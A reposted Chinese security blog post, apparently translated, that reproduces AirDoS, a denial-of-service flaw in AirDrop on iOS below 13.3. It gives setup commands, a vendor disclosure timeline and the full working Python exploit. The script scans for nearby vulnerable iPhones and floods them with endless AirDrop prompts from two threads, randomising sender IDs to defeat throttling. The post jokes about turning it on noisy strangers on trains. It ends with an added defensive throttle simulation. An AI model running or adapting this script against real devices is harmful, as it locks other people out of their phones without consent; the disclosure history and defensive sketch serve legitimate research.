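Meow meow meow
This vuln is quite interesting, a must-have for home and travel!
First, let's see what the original author says.
https://kishanbagaria.com/airdos/ [go read it yourself]
OK, done reading 🐣🐣🐣 In short: when someone else's iPhone or iPad is set to allow everyone to send files to it, this vulnerability can be used to mess with it. It requires a system version below 13.3; I'm the kind of person who just never gets around to upgrading. PoC: https://github.com/KishanBagaria/AirDoS/blob/master/AirDoS.py
Test environment:
iPad Pro 13.2
Before testing, remember: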
Usage
Run brew install libarchive openssl@1.1 if not already installed
Set environment variables:
export LIBARCHIVE=/usr/local/opt/libarchive/lib/libarchive.dylib
export LIBCRYPTO=/usr/local/opt/openssl@1.1/lib/libcrypto.dylib
Run pip3 install -r requirements.txt
Run python3 AirDoS.py
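Screenshot of my results
Vulnerability reproduction video
Vulnerability timeline
2019-08-19: Report sent to Apple
2019-10-03: Asked for an update
2019-10-03: Apple replied: "We are still investigating this issue. If we determine that our products are affected, we may prepare a security update for our customers."
2019-11-14: Apple emailed: "We will address the issue you reported with a mitigation in an upcoming security update, and we would like you to test our latest iOS 13.3 beta to determine whether the issue is resolved. On receiving a CVE, we would like to publicly acknowledge your assistance in the security advisory."
2019-11-15: I replied to Apple that the vulnerability was fixed in iOS 13.3 beta 2 and asked when it could be publicly disclosed
2019-11-15: Apple answered: "We would appreciate it if you could refrain from discussing this issue publicly until the security update has been released to our customers. The security update is currently planned for mid-December 2019."
2019-12-10: iOS 13.3 released with its security advisory; publicly disclosed
Originally published on the WeChat official account (RedTeamWing): IOS-AirDrop-Dos reproduction [a cure for people who play Douyin out loud on high-speed trains
Further reading (commentary/knowledge):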
#!/usr/bin/env python3
"""
AirDoS by Kishan Bagaria
https://kishanbagaria.com/airdos/
"""

import ipaddress
import json
import logging
import plistlib
import random
import threading

from colorama import Fore, Back, Style
from opendrop.client import AirDropBrowser, AirDropClient
from opendrop.config import AirDropConfig, AirDropReceiverFlags

start_new_lines = '\n' * 10
end_new_lines = '\n' * 100
SENDER_NAME = 'Attacker 😈'
FILE_NAME = f"""
{start_new_lines}
⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️
😈😈😈😈😈
You can no longer use this device
Go outside and play!
⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️
{end_new_lines}
😈
"""

rand = lambda: '{0:0{1}x}'.format(random.randint(0, 0xffffffffffff), 12)

attack_counts = {}
config = AirDropConfig()
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO, format=f'{Style.DIM}%(asctime)s{Style.RESET_ALL} %(message)s')

def get_os_version(discover):
    try:
        receiver_media_cap = json.loads(discover['ReceiverMediaCapabilities'])
        return receiver_media_cap['Vendor']['com.apple']['OSVersion']
    except:
        pass

def get_is_mac(os_version):
    if os_version:
        if os_version[0] == 10 and os_version[1] >= 7:
            return True
    return False

def get_is_vuln(os_version):
    if os_version:
        if (os_version[0] == 13 and os_version[1] >= 3) or os_version[0] >= 14:
            return False
    return True

def send_ask(node_info):
    ask_body = {
        'SenderComputerName': SENDER_NAME,
        'SenderModelName': rand(),
        'SenderID': rand(),
        'BundleID': 'com.apple.finder',
        'Files': [{
            'FileName': FILE_NAME,
            'FileType': 'public.plain-text'
        }]
    }
    ask_binary = plistlib.dumps(ask_body, fmt=plistlib.FMT_BINARY)
    id = node_info['id']
    attack_counts[id] = attack_counts.get(id, 1) + 1
    try:
        client = AirDropClient(config, (node_info['address'], node_info['port']))
        success, _ = client.send_POST('/Ask', ask_binary)
        if success: # if user accepted
            client.send_POST('/Upload', None)
        return success
    except:
        pass

def send(node_info):
    name = node_info['name']
    id = node_info['id']
    attack_count = attack_counts.get(id, 1)
    receiver_name = Fore.GREEN + name + Fore.RESET
    logging.info(f'❔ Prompting {receiver_name} (#{attack_count})')
    success = send_ask(node_info)
    if success == True:
        logging.info(f'✅ Accepted by {receiver_name} (#{attack_count})')
    elif success == False:
        logging.info(f'❎ Declined by {receiver_name} (#{attack_count})')
    else:
        logging.info(f'🛑 Errored {receiver_name} (#{attack_count})')
    return success

def brute(node_info):
    error_count = 0
    while True:
        if send(node_info) == None:
            error_count += 1
            if error_count > 2:
                break

def start_brute(node_info):
    # two threads just for good measure
    # this makes sure there is always another popup to decline if there is any network delay
    for i in range(2):
        thread = threading.Thread(target=brute, args=(node_info,))
        thread.start()

def found_receiver(info):
    thread = threading.Thread(target=on_receiver_found, args=(info,))
    thread.start()

def send_discover(client):
    discover_body = {}
    discover_plist_binary = plistlib.dumps(discover_body, fmt=plistlib.FMT_BINARY)
    success, response_bytes = client.send_POST('/Discover', discover_plist_binary)
    response = plistlib.loads(response_bytes)
    return response

def on_receiver_found(info):
    try:
        address = ipaddress.ip_address(info.address).compressed
    except ValueError:
        return
    id = info.name.split('.')[0]
    hostname = info.server
    port = int(info.port)
    client = AirDropClient(config, (address, int(port)))
    flags = int(info.properties[b'flags'])

    receiver_name = None
    if flags & AirDropReceiverFlags.SUPPORTS_DISCOVER_MAYBE:
        try:
            discover = send_discover(client)
            receiver_name = discover.get('ReceiverComputerName')
            os_version = get_os_version(discover)
        except:
            pass
    discoverable = receiver_name is not None

    node_info = {
        'name': receiver_name,
        'address': address,
        'port': port,
        'id': id,
        'flags': flags,
        'discoverable': discoverable,
    }
    if discoverable:
        os_v = '.'.join(map(str, os_version)) if os_version else ''
        is_mac = get_is_mac(os_version)
        is_vuln = get_is_vuln(os_version)
        additional = f'{Style.DIM}{id} {hostname} [{address}]:{port}{Style.RESET_ALL}'
        if is_mac:
            logger.info('❌ Ignoring {:32} macOS {:>7} {}'.format(Fore.YELLOW + receiver_name + Fore.RESET, os_v, additional))
        elif not is_vuln:
            logger.info('❌ Ignoring {:32} iOS {:>7} {}'.format(Fore.RED + receiver_name + Fore.RESET, os_v, additional))
        else:
            logger.info('🔍 Found {:32} iOS {:>7} {}'.format(Fore.GREEN + receiver_name + Fore.RESET, os_v, additional))
            start_brute(node_info)

logger.info('⏳ Looking for devices... Open Finder -> AirDrop')
browser = AirDropBrowser(config)
browser.start(callback_add=found_receiver)
try:
    input()
except KeyboardInterrupt:
    pass
finally:
    if browser is not None:
        browser.stop()
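The PoC above fills SenderID and SenderModelName with a fresh rand() value on every /Ask request, so a receiver that counts declined prompts per sender ID never sees the same sender twice. The sketch below is an added example, not part of the original post or of AirDoS: it models a receiver-side throttle over constructed events and compares keying on the sender ID with keying on the connection's source address. The window, threshold, field names and sample address are assumptions, not Apple's actual mitigation.

```python
from collections import defaultdict, deque

WINDOW_SECONDS = 60   # assumed look-back window
MAX_DECLINES = 3      # assumed number of declines before auto-declining


class AskThrottle:
    """Receiver-side model: stop prompting a source after repeated declines."""

    def __init__(self, key_field):
        self.key_field = key_field          # field that identifies "the same sender"
        self.declines = defaultdict(deque)  # key -> timestamps of recent declines

    def should_prompt(self, event):
        """Return True if this /Ask should still reach the user as a prompt."""
        recent = self.declines[event[self.key_field]]
        while recent and event["ts"] - recent[0] > WINDOW_SECONDS:
            recent.popleft()                # forget declines outside the window
        return len(recent) < MAX_DECLINES

    def record_decline(self, event):
        self.declines[event[self.key_field]].append(event["ts"])


def simulate(events, key_field):
    """Count prompts shown when the user declines every prompt they see."""
    throttle = AskThrottle(key_field)
    shown = 0
    for ev in events:
        if throttle.should_prompt(ev):
            shown += 1
            throttle.record_decline(ev)
    return shown


# Constructed sample: 20 /Ask requests, one per second, from a single
# link-local address, each with a different 12-hex-digit SenderID.
SAMPLE_EVENTS = [
    {"ts": float(i), "addr": "fe80::1c2d:3e4f:5a6b:7c8d",
     "sender_id": f"{i * 7919:012x}"}
    for i in range(20)
]


def compare():
    return {
        "keyed_on_sender_id": simulate(SAMPLE_EVENTS, "sender_id"),
        "keyed_on_address": simulate(SAMPLE_EVENTS, "addr"),
    }


if __name__ == "__main__":
    print(compare())
```
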
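Article title: IOS-AirDrop-Dos reproduction [a cure for people who play Douyin out loud on high-speed trains
Article link (please include this link when reposting): https://vulsee.com/archives/vulsee_2019/1212_9639.html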